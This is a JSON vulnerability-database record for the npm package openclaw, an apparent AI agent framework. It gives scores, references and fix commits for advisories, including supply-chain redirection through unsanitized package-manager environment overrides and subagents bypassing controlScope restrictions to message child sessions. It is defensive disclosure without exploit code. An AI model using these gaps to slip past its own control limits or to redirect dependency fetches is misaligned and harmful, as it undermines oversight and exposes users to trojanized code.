{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","type":"npm","namespace":"","name":"openclaw","version":"2026.3.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2026.4.23","latest_non_vulnerable_version":"2026.4.23","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91298?format=json","vulnerability_id":"VCID-11dg-bvft-6kb1","summary":"OpenClaw's incomplete host env sanitization blocklist allows supply-chain redirection via package-manager env overrides\n## Summary\n\nHost exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior.\n\n## Impact\n\nAn approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.22`\n- Patched: `>= 2026.3.22`\n\n## Fix\n\nFixed by commit `7abfff756d` (`Exec: harden host env override handling across gateway and node`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41387","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06029","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06013","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06015","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41387"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.22","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.22"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41387","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41387"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization"},{"reference_url":"https://github.com/advisories/GHSA-j7p2-qcwm-94v4","reference_id":"GHSA-j7p2-qcwm-94v4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j7p2-qcwm-94v4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-41387","GHSA-j7p2-qcwm-94v4"],"risk_score":4.3,"exploitability":"0.5","weighted_severity":"8.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-11dg-bvft-6kb1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91737?format=json","vulnerability_id":"VCID-1728-wc17-dud6","summary":"OpenClaw leaf subagents can bypass controlScope restrictions to send messages to child sessions\n## Summary\nLeaf subagents could still use the send action to message controlled child sessions even when their controlScope was narrower than children.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7679eb375294941b02214c234aff3948796969d0`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/auto-reply/reply/commands-subagents/action-send.ts now threads controller context through the send path.\n- src/agents/subagent-control.ts now blocks send attempts unless the requester owns the target and has controlScope=\"children\".\n\nOpenClaw thanks @space08 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35662","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.111","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11059","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11093","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35662"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35662","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35662"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action"},{"reference_url":"https://github.com/advisories/GHSA-x2cm-hg9c-mf5w","reference_id":"GHSA-x2cm-hg9c-mf5w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x2cm-hg9c-mf5w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-r